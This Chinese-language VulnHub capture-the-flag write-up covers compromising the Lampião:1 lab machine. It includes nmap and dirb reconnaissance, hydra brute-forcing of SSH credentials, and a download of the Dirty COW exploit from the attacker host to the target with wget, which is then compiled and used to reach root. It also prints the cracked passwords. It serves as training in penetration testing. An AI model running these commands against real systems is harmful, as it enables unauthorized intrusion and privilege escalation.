《VulnHub》Lampião:1
@TOC
VulnHub 打靶记录。
VulnHub 官网:https://www.vulnhub.com
攻击机为 Kali-Linux-2023.3-vmware-amd64。
Kali NAT IP:192.168.8.15。
1:靶场信息
靶场地址:
https://www.vulnhub.com/entry/lampiao-1,249/
2:打靶
2.1:情报收集 & 威胁建模
主机发现:nmap -sn 192.168.8.0/24
确定目标 IP 为 192.168.8.139。
进行端口扫描、服务探测、操作系统探测:nmap 192.168.8.139 -p- -sV -sC -O
1 | Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 15:23 HKT |
对开放的端口探测漏洞:nmap 192.168.8.139 -p 22,80,1898 --script=vuln
根据之前得到的信息访问一下 80 端口。
查看源码也没有发现什么信息。那就访问一下 1898 端口。
发现一篇文章可以点击。
遍历一下网页节点,发现两个信息。
qrc.png 是一张二维码,扫描后没有有用的信息。
audio.m4a 是一段音频。
播放后可以听到以下信息:
1 | user tiago |
以下这个页面也是没有什么有效信息。
尝试爆破一下网页目录:dirb http://192.168.8.139:1898/
爆破多级目录:dirb http://192.168.8.139:1898/ -w
没有爆破出什么有用信息。倒是在 robots.txt 文件中发现一个 CHANGELOG.txt 文件
在这里可以看到 CMS 版本:Drupal 7.54, 2017-02-01
至此页面没啥可获取的信息了。发挥一下这个网站的余热,用它来生成一份社工性质的字典。
使用 cewl 通过爬虫获取关键信息创建一个密码字典:cewl http://192.168.8.139:1898/ -w cewl.txt
2.2:漏洞分析 & 渗透攻击
根据前面获取的 user tiago
信息,尝试爆破一下 ssh 密码。
hydra 爆破 ssh 密钥:hydra -l tiago -P cewl.txt 192.168.8.139 ssh
成功爆破出账号密码。
1 | host: 192.168.8.139 login: tiago password: Virgulino |
使用刚刚获得的用户登录 ssh。
也可以使用 MSF 利用 Drupal 漏洞进行渗透攻击。这里不做记录。
2.3:后渗透
谷歌搜索一下 Linux 相关检测脚本,可以检测 Linux 上的安全缺陷。关键字:linux exploit suggest
可以用推荐的命令快速下载:wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
在相应目录下开启一个简单的 http 服务,便于目标机器下载相应利用代码。python3 -m http.server 8088
目标机器中,进入 /tmp/ 目录,下载。wget http://192.168.8.15:8088/les.sh
赋权并运行,检测目标机器上的安全缺陷。
安全缺陷枚举信息如下(只列出一部分):
1 | tiago@lampiao:/tmp$ chmod +x les.sh |
同时查看一下目标系统 sudo 命令版本信息:sudo --version
注意到目标系统存在 “ 脏牛 ” 漏洞。查找一下可用 exp。searchsploit 40847
查找一下相关的信息。
可以看到利用信息。
将 kali 上的 exp 拷贝到某个目录,并开启 http 服务,将 exp 上传至目标。
1 | cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/Desktop/lampiao/ |
wget http://192.168.8.15:8088/40847.cpp
编译为可执行文件并运行。
1 | g++ -Wall -pedantic -O2 -std=c++11 -pthread -o myexp 40847.cpp -lutil |
利用成功,使用以上密码(dirtyCowFun
)即可登录 root。
ssh root@192.168.8.139
完结。
3:总结
3.1:命令 & 工具
- nmap
- dirb
- cewl
- hydra
- linux-exploit-suggester
https://github.com/The-Z-Labs/linux-exploit-suggester - wget
- python
- searchsploit
- g++
- ssh
3.1.1:Nmap
部分选项:
参数 | 介绍 |
---|---|
-sn |
Ping Scan - disable port scan |
-sV |
Probe open ports to determine service/version info |
-sC |
equivalent to --script=default |
-O |
Enable OS detection |
--script=<Lua scripts> |
<Lua scripts> is a comma separated list of directories, script-files or script-categories |
nmap 脚本:
--script=default
:默认的脚本,提供一些基本的漏洞探测和信息收集。--script=vuln
:用于检测目标系统上的漏洞。
3.1.2:dirb
dirb,kali linux 下的一个 web 网站目录爆破工具。
部分选项:
参数 | 介绍 |
---|---|
-w |
Don't Stop on WARNING messages. |
《Dirb工具web网站目录爆破指南》:
https://zhuanlan.zhihu.com/p/267973016
3.2:关键技术
主机发现:
nmap -sn <ip cidr>
端口扫描、服务探测、操作系统探测:
nmap <target> -p- -sV -sC -O
对开放的端口探测漏洞:
nmap <target> -p <port> --script=vuln
爆破网站目录:
dirb <url> [-w]
爬取网页,创建社工密码字典:
cewl <url> -w <txt file>
hydra 破解 ssh 密钥:
hydra -l <user> -P <password file> <target> ssh
使用 sh 脚本检测 Linux 系统的安全缺陷。项目地址:https://github.com/The-Z-Labs/linux-exploit-suggester
在目录下开启简单 http 服务:
python3 -m http.server 8088
查找 kali 自带的 exp:
searchsploit <id>
40847 DirtyCow 利用:
https://www.exploit-db.com/exploits/40847g++ -Wall -pedantic -O2 -std=c++11 -pthread -o myexp 40847.cpp -lutil
贫贱非辱,贫贱而谄求于人者为辱。
——《围炉夜话》(清)王永彬